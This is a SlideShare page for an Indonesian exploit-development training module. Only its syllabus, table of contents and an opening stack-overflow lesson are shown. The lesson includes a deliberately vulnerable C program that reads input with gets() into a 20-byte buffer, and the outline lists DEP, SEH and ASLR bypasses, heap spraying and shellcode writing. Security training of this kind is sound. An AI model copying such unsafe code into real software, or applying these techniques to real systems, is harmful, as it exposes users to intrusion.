SlideShare uma empresa Scribd logo

Syllabus Advanced Exploit Development 22-23 June 2013

Dan H
Dan H

Syllabus advanced exploit development 22-23 June 2013 - Fuzzing - Direct Return - Smashing Stack - Bypass mitigation 1. ASLR (Address space layout randomization) 2. SEH (Structured Exception Handling) 3. Safe SEH (Safe Structured Exception Handling) 4. DEP (Data Execution Prevention) Hari kedua (windows exploit) lebih mantab bro - Heap spray - Web browser exploitation (exploit writing for web browser) - Metasploit Module Development - Denial Of Service using buffer overflow vulnerability - Shellcode Development - Shellcode Injection - Reporting www.hatsecure.com

Tecnologia
1 de 7
Baixar para ler offline
HATSECURE TRAINING #SESSION-1 ADVANCED EXPLOIT DEVELOPMENT Danang Heriyadi danang@hatsecure.com Copyright By Hatsecure Advanced Exploit Development
Disclaimer Dilarang merubah isi modul dan menggandakan modul ini tanpa seijin penulis Copyright By Hatsecure Copyright By Hatsecure Advanced Exploit Development
Table of Contents Introduction......................................................................................................... 1 0x01 Classic stack overflow....................................................................... 2 Objective................................................................................................ 2 Overview.................................................................................................... 2 Exercise....................................................................................................... 2 Free float FTP Vulnerability................................................................... 3 Fuzzing : Crash the service............................................................... 3 Fuzzing : Finding the Right Offset to EIP.......................................... 3 Controlling the EIP........................................................................... 3 Take over the victim.......................................................................... 3 Conclusion.............................................................................................. 3 0x02 Bypassing Structured Exception Handling.................................. 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Structured Exception Handling......................................................... 3 SEH / Safe SEH Bypassing Theory.................................................... 3 Testing SEH / SafeSEH protection.................................................... 3 Exercise............................................................................................. 3 All Media Server Vulnerability................................................................ 3 Module intruction mapping................................................................ 3 Returning into our shellcode............................................................. 3 Conclusion.............................................................................................. 3 0x03 Bypassing Data Exception Prevention.......................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Copyright By Hatsecure Advanced Exploit Development
Data Exception Prevention................................................................ 3 DEP Bypassing theory....................................................................... 3 Testing DEP Protection..................................................................... 3 Case Of study : Sami FTP Vulnerability................................................. 3 Return Oriented Programming.......................................................... 3 Defeating DEP with ROP.................................................................. 3 Returning into our shellcode............................................................. 3 Conclusion.............................................................................................. 3 0x03 Bypassing ASLR in windows 7......................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Address Space Layout Randomization.............................................. 3 ASLR bypass theory.......................................................................... 3 0x04 Heap Memory Exploitation............................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Heap Memory Layout........................................................................ 3 Case Of Study : Heap Spraying Internet Explorer................................. 3 Heap Spray Technique....................................................................... 3 Triggering Vulnerability..................................................................... 3 Returning into heap buffer................................................................ 3 Conclusion.............................................................................................. 3 0x05 Metasploit Module Development................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Convert your exploit to metasploit module...................................... 3 Copyright By Hatsecure Advanced Exploit Development
0x06 Shellcode Development..................................................................... 3 Objective................................................................................................ 3 Overview........................................................................................... 3 Software Required............................................................................ 3 Windows API.................................................................................... 3 Static Shellcode Writing......................................................................... 3 Message Box..................................................................................... 3 Windows Execute............................................................................. 3 Combination shellcode...................................................................... 3 Convert your shellcode to metasploit module................................. 3 Shellcode Injection with metasploit....................................................... 3 Reporting................................................................................................ 3 Copyright By Hatsecure Advanced Exploit Development
Introduction Exploit adalah suatu script yang menyerang melalui celah keamanan komputer secara spesifik. Dalam exploit terkadang ditemukan suatu shellcode, shellcode inilah yang menjadi suatu amunisi dari tool exploit. Tool exploit bukan hal yang asing oleh seseorang yang menjadi praktisi keamanan. Tool ini bisa digunakan untuk menguji keamanan secara legal. Pada training “advanced exploit development” ini kita akan membahas dan mengupas bagaimana seorang praktisi keamanan mencari celah keamanan, membuat dan mengembangkan exploit. Copyright By Hatsecure Advanced Exploit Development
0x01 Classic Stack Overflow Objective • Memahami konsep stack overflow • Memahami metode debugging • Memahami metode fuzzing atau fuzz testing • Mampu mengeksploitasi celah stack overflow Overview Celah basis stack overflow terjadi ketika software melakukan penulisan data melebihi kapasitas buffer. Sehingga data yang melebihi tersebut akan merubah nilai yang ada dalam register memory. Contoh source code yang memiliki celah stack overflow : Source code diatas ketika kita kompilasi dan eksekusi.Kita hanya dapat mengisi data maksimal 20 karakter dan apabila lebih dari 20 karakter, data yang kita masukkan akan merubah nilai yang ada dalam register memory. Exercise Cobalah untuk mengulang hingga memahami konsep dan eksploitasi stack overflow Copyright By Hatsecure Advanced Exploit Development #include <stdio.h> int main(){ char data[20]; printf(“Masukkan data : “); gets(data); return 0; }

Recomendados

Linux 101-hacks
Linux 101-hacksLinux 101-hacks
Linux 101-hacksshekarkcb
 
Cisco routers for the small business a practical guide for it professionals...
Cisco routers for the small business a practical guide for it professionals...Cisco routers for the small business a practical guide for it professionals...
Cisco routers for the small business a practical guide for it professionals...Mark Smith
 
Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdf
Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdfBlack_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdf
Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdfBoucif David
 
Sqlmap readme
Sqlmap readmeSqlmap readme
Sqlmap readmefangjiafu
 
Crypto101
Crypto101Crypto101
Crypto101mustafa sarac
 
Www.dedoimedo.com crash-book
Www.dedoimedo.com crash-bookWww.dedoimedo.com crash-book
Www.dedoimedo.com crash-bookSusant Sahani
 
digital marketing training in bangalore
digital marketing training in bangaloredigital marketing training in bangalore
digital marketing training in bangaloreVenus Tech Inc.
 
Dgs3612 g cli_dna
Dgs3612 g cli_dnaDgs3612 g cli_dna
Dgs3612 g cli_dnamaqc8321
 

Recomendados

Linux 101-hacks
Linux 101-hacksLinux 101-hacks
Linux 101-hacksshekarkcb
 
Cisco routers for the small business a practical guide for it professionals...
Cisco routers for the small business a practical guide for it professionals...Cisco routers for the small business a practical guide for it professionals...
Cisco routers for the small business a practical guide for it professionals...Mark Smith
 
Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdf
Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdfBlack_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdf
Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters.pdfBoucif David
 
Sqlmap readme
Sqlmap readmeSqlmap readme
Sqlmap readmefangjiafu
 
Crypto101
Crypto101Crypto101
Crypto101mustafa sarac
 
Www.dedoimedo.com crash-book
Www.dedoimedo.com crash-bookWww.dedoimedo.com crash-book
Www.dedoimedo.com crash-bookSusant Sahani
 
digital marketing training in bangalore
digital marketing training in bangaloredigital marketing training in bangalore
digital marketing training in bangaloreVenus Tech Inc.
 
Dgs3612 g cli_dna
Dgs3612 g cli_dnaDgs3612 g cli_dna
Dgs3612 g cli_dnamaqc8321
 
Odoo development
Odoo developmentOdoo development
Odoo developmentRamzi Hajjaji
 
Understand
UnderstandUnderstand
UnderstandKalimuthu Velappan
 
Windows_Server_2016_Virtualization White Paper By Veeam
Windows_Server_2016_Virtualization White Paper By VeeamWindows_Server_2016_Virtualization White Paper By Veeam
Windows_Server_2016_Virtualization White Paper By VeeamKesavan Munuswamy
 
Apache Web server Complete Guide
Apache Web server Complete GuideApache Web server Complete Guide
Apache Web server Complete Guidewebhostingguy
 
D space manual
D space manualD space manual
D space manualBibliounivbtn
 
Plesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXPlesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXwebhostingguy
 
Book VMWARE VMware ESXServer Advanced Technical Design Guide
Book VMWARE VMware ESXServer Advanced Technical Design Guide Book VMWARE VMware ESXServer Advanced Technical Design Guide
Book VMWARE VMware ESXServer Advanced Technical Design Guide aktivfinger
 
Help
HelpHelp
HelpAline Freitas
 
Positive Technologies WinCC Security Hardening Guide
Positive Technologies WinCC Security Hardening GuidePositive Technologies WinCC Security Hardening Guide
Positive Technologies WinCC Security Hardening Guideqqlan
 
Novell login documentation and troubleshooting
Novell login documentation and troubleshootingNovell login documentation and troubleshooting
Novell login documentation and troubleshootingChildren's Hospitals and Clinics
 
Zend Server Ce Reference Manual V403
Zend Server Ce Reference Manual V403Zend Server Ce Reference Manual V403
Zend Server Ce Reference Manual V403SMKF Plus Bani Saleh
 
Ssl2
Ssl2Ssl2
Ssl2karthickmsit
 
MONGODB
MONGODBMONGODB
MONGODBMichael Wu
 
Algoritmicx
AlgoritmicxAlgoritmicx
Algoritmicxnesrine000
 
Manual flacs
Manual flacsManual flacs
Manual flacsGustavo Adolfo Tueros Romero
 
Ibm system storage ds8700 disk encryption redp4500
Ibm system storage ds8700 disk encryption redp4500Ibm system storage ds8700 disk encryption redp4500
Ibm system storage ds8700 disk encryption redp4500Banking at Ho Chi Minh city
 
Smooth wall express_3_administrator_guide_v2
Smooth wall express_3_administrator_guide_v2Smooth wall express_3_administrator_guide_v2
Smooth wall express_3_administrator_guide_v2Romildo Silva
 
PT - Siemens WinCC Flexible Security Hardening Guide
PT - Siemens WinCC Flexible Security Hardening GuidePT - Siemens WinCC Flexible Security Hardening Guide
PT - Siemens WinCC Flexible Security Hardening Guideqqlan
 
Snort manual
Snort manualSnort manual
Snort manualMiguel A. Gómez Álvarez
 
Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)Dan H
 
Linux Exploit Research
Linux Exploit ResearchLinux Exploit Research
Linux Exploit ResearchDan H
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemDan H
 

Mais conteúdo relacionado

Mais procurados

Windows_Server_2016_Virtualization White Paper By Veeam
Windows_Server_2016_Virtualization White Paper By VeeamWindows_Server_2016_Virtualization White Paper By Veeam
Windows_Server_2016_Virtualization White Paper By VeeamKesavan Munuswamy
 
Apache Web server Complete Guide
Apache Web server Complete GuideApache Web server Complete Guide
Apache Web server Complete Guidewebhostingguy
 
Plesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXPlesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXwebhostingguy
 
Book VMWARE VMware ESXServer Advanced Technical Design Guide
Book VMWARE VMware ESXServer Advanced Technical Design Guide Book VMWARE VMware ESXServer Advanced Technical Design Guide
Book VMWARE VMware ESXServer Advanced Technical Design Guide aktivfinger
 
Positive Technologies WinCC Security Hardening Guide
Positive Technologies WinCC Security Hardening GuidePositive Technologies WinCC Security Hardening Guide
Positive Technologies WinCC Security Hardening Guideqqlan
 
Zend Server Ce Reference Manual V403
Zend Server Ce Reference Manual V403Zend Server Ce Reference Manual V403
Zend Server Ce Reference Manual V403SMKF Plus Bani Saleh
 
Ibm system storage ds8700 disk encryption redp4500
Ibm system storage ds8700 disk encryption redp4500Ibm system storage ds8700 disk encryption redp4500
Ibm system storage ds8700 disk encryption redp4500Banking at Ho Chi Minh city
 
Smooth wall express_3_administrator_guide_v2
Smooth wall express_3_administrator_guide_v2Smooth wall express_3_administrator_guide_v2
Smooth wall express_3_administrator_guide_v2Romildo Silva
 
PT - Siemens WinCC Flexible Security Hardening Guide
PT - Siemens WinCC Flexible Security Hardening GuidePT - Siemens WinCC Flexible Security Hardening Guide
PT - Siemens WinCC Flexible Security Hardening Guideqqlan
 

Mais procurados (19)

Odoo development
Odoo developmentOdoo development
Odoo development
 
Understand
UnderstandUnderstand
Understand
 
Windows_Server_2016_Virtualization White Paper By Veeam
Windows_Server_2016_Virtualization White Paper By VeeamWindows_Server_2016_Virtualization White Paper By Veeam
Windows_Server_2016_Virtualization White Paper By Veeam
 
Apache Web server Complete Guide
Apache Web server Complete GuideApache Web server Complete Guide
Apache Web server Complete Guide
 
D space manual
D space manualD space manual
D space manual
 
Plesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIXPlesk 8.0 for Linux/UNIX
Plesk 8.0 for Linux/UNIX
 
Book VMWARE VMware ESXServer Advanced Technical Design Guide
Book VMWARE VMware ESXServer Advanced Technical Design Guide Book VMWARE VMware ESXServer Advanced Technical Design Guide
Book VMWARE VMware ESXServer Advanced Technical Design Guide
 
Help
HelpHelp
Help
 
Positive Technologies WinCC Security Hardening Guide
Positive Technologies WinCC Security Hardening GuidePositive Technologies WinCC Security Hardening Guide
Positive Technologies WinCC Security Hardening Guide
 
Novell login documentation and troubleshooting
Novell login documentation and troubleshootingNovell login documentation and troubleshooting
Novell login documentation and troubleshooting
 
Zend Server Ce Reference Manual V403
Zend Server Ce Reference Manual V403Zend Server Ce Reference Manual V403
Zend Server Ce Reference Manual V403
 
Ssl2
Ssl2Ssl2
Ssl2
 
MONGODB
MONGODBMONGODB
MONGODB
 
Algoritmicx
AlgoritmicxAlgoritmicx
Algoritmicx
 
Manual flacs
Manual flacsManual flacs
Manual flacs
 
Ibm system storage ds8700 disk encryption redp4500
Ibm system storage ds8700 disk encryption redp4500Ibm system storage ds8700 disk encryption redp4500
Ibm system storage ds8700 disk encryption redp4500
 
Smooth wall express_3_administrator_guide_v2
Smooth wall express_3_administrator_guide_v2Smooth wall express_3_administrator_guide_v2
Smooth wall express_3_administrator_guide_v2
 
PT - Siemens WinCC Flexible Security Hardening Guide
PT - Siemens WinCC Flexible Security Hardening GuidePT - Siemens WinCC Flexible Security Hardening Guide
PT - Siemens WinCC Flexible Security Hardening Guide
 
Snort manual
Snort manualSnort manual
Snort manual
 

Destaque

Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)Dan H
 
Linux Exploit Research
Linux Exploit ResearchLinux Exploit Research
Linux Exploit ResearchDan H
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemDan H
 
Backtrack 5 - network pentest
Backtrack 5 - network pentestBacktrack 5 - network pentest
Backtrack 5 - network pentestDan H
 
Seminar Hacking & Security Analysis
Seminar Hacking & Security AnalysisSeminar Hacking & Security Analysis
Seminar Hacking & Security AnalysisDan H
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit developmentDan H
 
Backtrack 5 - web pentest
Backtrack 5 - web pentestBacktrack 5 - web pentest
Backtrack 5 - web pentestDan H
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)Ammar WK
 
Materi Vulnerability Development
Materi Vulnerability DevelopmentMateri Vulnerability Development
Materi Vulnerability DevelopmentDan H
 
Workshop 101 - Penetration testing & Vulnerability Assessment
Workshop 101 - Penetration testing & Vulnerability AssessmentWorkshop 101 - Penetration testing & Vulnerability Assessment
Workshop 101 - Penetration testing & Vulnerability AssessmentDan H
 
Workshop tp link router & open wrt
Workshop tp link router & open wrtWorkshop tp link router & open wrt
Workshop tp link router & open wrtDan H
 
Exploiting arm linux
Exploiting arm linuxExploiting arm linux
Exploiting arm linuxDan H
 
Welcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation ConversationWelcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation ConversationSuzanne M. Sullivan
 
The (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined NetworksThe (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined NetworksTalal Alharbi
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniquesguest66dc5f
 
VMRay intro video
VMRay intro videoVMRay intro video
VMRay intro videoChad Loeven
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Alur attacking web (sisi client)
Alur attacking web (sisi client)Alur attacking web (sisi client)
Alur attacking web (sisi client)Chandra Zeattacker
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & moreMattias Geniar
 

Destaque (20)

Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)Advanced Exploit Development (Updated on 28 January, 2016)
Advanced Exploit Development (Updated on 28 January, 2016)
 
Linux Exploit Research
Linux Exploit ResearchLinux Exploit Research
Linux Exploit Research
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment system
 
Backtrack 5 - network pentest
Backtrack 5 - network pentestBacktrack 5 - network pentest
Backtrack 5 - network pentest
 
Seminar Hacking & Security Analysis
Seminar Hacking & Security AnalysisSeminar Hacking & Security Analysis
Seminar Hacking & Security Analysis
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit development
 
Backtrack 5 - web pentest
Backtrack 5 - web pentestBacktrack 5 - web pentest
Backtrack 5 - web pentest
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Web Hacking (basic)
Web Hacking (basic)Web Hacking (basic)
Web Hacking (basic)
 
Materi Vulnerability Development
Materi Vulnerability DevelopmentMateri Vulnerability Development
Materi Vulnerability Development
 
Workshop 101 - Penetration testing & Vulnerability Assessment
Workshop 101 - Penetration testing & Vulnerability AssessmentWorkshop 101 - Penetration testing & Vulnerability Assessment
Workshop 101 - Penetration testing & Vulnerability Assessment
 
Workshop tp link router & open wrt
Workshop tp link router & open wrtWorkshop tp link router & open wrt
Workshop tp link router & open wrt
 
Exploiting arm linux
Exploiting arm linuxExploiting arm linux
Exploiting arm linux
 
Welcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation ConversationWelcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation Conversation
 
The (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined NetworksThe (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined Networks
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniques
 
VMRay intro video
VMRay intro videoVMRay intro video
VMRay intro video
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Alur attacking web (sisi client)
Alur attacking web (sisi client)Alur attacking web (sisi client)
Alur attacking web (sisi client)
 
Code obfuscation, php shells & more
Code obfuscation, php shells & moreCode obfuscation, php shells & more
Code obfuscation, php shells & more
 

Semelhante a Syllabus Advanced Exploit Development 22-23 June 2013

Cisco Virtualization Experience Infrastructure
Cisco Virtualization Experience InfrastructureCisco Virtualization Experience Infrastructure
Cisco Virtualization Experience Infrastructureogrossma
 
IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...
IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...
IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...IBM India Smarter Computing
 
Introducing and Implementing IBM FlashSystem V9000
Introducing and Implementing IBM FlashSystem V9000Introducing and Implementing IBM FlashSystem V9000
Introducing and Implementing IBM FlashSystem V9000Michael Martin
 
Ibm power systems e870 and e880 technical overview and introduction
Ibm power systems e870 and e880 technical overview and introductionIbm power systems e870 and e880 technical overview and introduction
Ibm power systems e870 and e880 technical overview and introductionDiego Alberto Tamayo
 
Intel добавит в CPU инструкции для глубинного обучения
Intel добавит в CPU инструкции для глубинного обученияIntel добавит в CPU инструкции для глубинного обучения
Intel добавит в CPU инструкции для глубинного обученияAnatol Alizar
 
IBM Power 770 and 780 Technical Overview and Introduction
IBM Power 770 and 780 Technical Overview and IntroductionIBM Power 770 and 780 Technical Overview and Introduction
IBM Power 770 and 780 Technical Overview and IntroductionIBM India Smarter Computing
 
java web_programming
java web_programmingjava web_programming
java web_programmingbachector
 
Mx Odbc
Mx OdbcMx Odbc
Mx Odbcfire9
 
Implementing the ibm storwize v3700
Implementing the ibm storwize v3700Implementing the ibm storwize v3700
Implementing the ibm storwize v3700Diego Alberto Tamayo
 
IBM Power 750 and 760 Technical Overview and Introduction
IBM Power 750 and 760 Technical Overview and IntroductionIBM Power 750 and 760 Technical Overview and Introduction
IBM Power 750 and 760 Technical Overview and IntroductionIBM India Smarter Computing
 
C++ annotations version
C++ annotations versionC++ annotations version
C++ annotations versionPL Sharma
 

Semelhante a Syllabus Advanced Exploit Development 22-23 June 2013 (20)

Cisco Virtualization Experience Infrastructure
Cisco Virtualization Experience InfrastructureCisco Virtualization Experience Infrastructure
Cisco Virtualization Experience Infrastructure
 
IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...
IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...
IBM eX5 Portfolio Overview IBM System x3850 X5, x3950 X5, x3690 X5, and Blade...
 
Introducing and Implementing IBM FlashSystem V9000
Introducing and Implementing IBM FlashSystem V9000Introducing and Implementing IBM FlashSystem V9000
Introducing and Implementing IBM FlashSystem V9000
 
Red paper
Red paperRed paper
Red paper
 
Ibm power systems e870 and e880 technical overview and introduction
Ibm power systems e870 and e880 technical overview and introductionIbm power systems e870 and e880 technical overview and introduction
Ibm power systems e870 and e880 technical overview and introduction
 
redp5222.pdf
redp5222.pdfredp5222.pdf
redp5222.pdf
 
Intel добавит в CPU инструкции для глубинного обучения
Intel добавит в CPU инструкции для глубинного обученияIntel добавит в CPU инструкции для глубинного обучения
Intel добавит в CPU инструкции для глубинного обучения
 
AIX 5L Differences Guide Version 5.3 Edition
AIX 5L Differences Guide Version 5.3 EditionAIX 5L Differences Guide Version 5.3 Edition
AIX 5L Differences Guide Version 5.3 Edition
 
IBM Power 770 and 780 Technical Overview and Introduction
IBM Power 770 and 780 Technical Overview and IntroductionIBM Power 770 and 780 Technical Overview and Introduction
IBM Power 770 and 780 Technical Overview and Introduction
 
sg246506
sg246506sg246506
sg246506
 
Java web programming
Java web programmingJava web programming
Java web programming
 
IBM BladeCenter Products and Technology
IBM BladeCenter Products and TechnologyIBM BladeCenter Products and Technology
IBM BladeCenter Products and Technology
 
java web_programming
java web_programmingjava web_programming
java web_programming
 
IBM zEnterprise 114 Technical Guide
IBM zEnterprise 114 Technical GuideIBM zEnterprise 114 Technical Guide
IBM zEnterprise 114 Technical Guide
 
Mx Odbc
Mx OdbcMx Odbc
Mx Odbc
 
Sg248107 Implementing the IBM Storwize V3700
Sg248107 Implementing the IBM Storwize V3700Sg248107 Implementing the IBM Storwize V3700
Sg248107 Implementing the IBM Storwize V3700
 
Implementing the ibm storwize v3700
Implementing the ibm storwize v3700Implementing the ibm storwize v3700
Implementing the ibm storwize v3700
 
IBM Power 750 and 760 Technical Overview and Introduction
IBM Power 750 and 760 Technical Overview and IntroductionIBM Power 750 and 760 Technical Overview and Introduction
IBM Power 750 and 760 Technical Overview and Introduction
 
IBM Flex System Interoperability Guide
IBM Flex System Interoperability GuideIBM Flex System Interoperability Guide
IBM Flex System Interoperability Guide
 
C++ annotations version
C++ annotations versionC++ annotations version
C++ annotations version
 

Último

Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 

Último (20)

Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
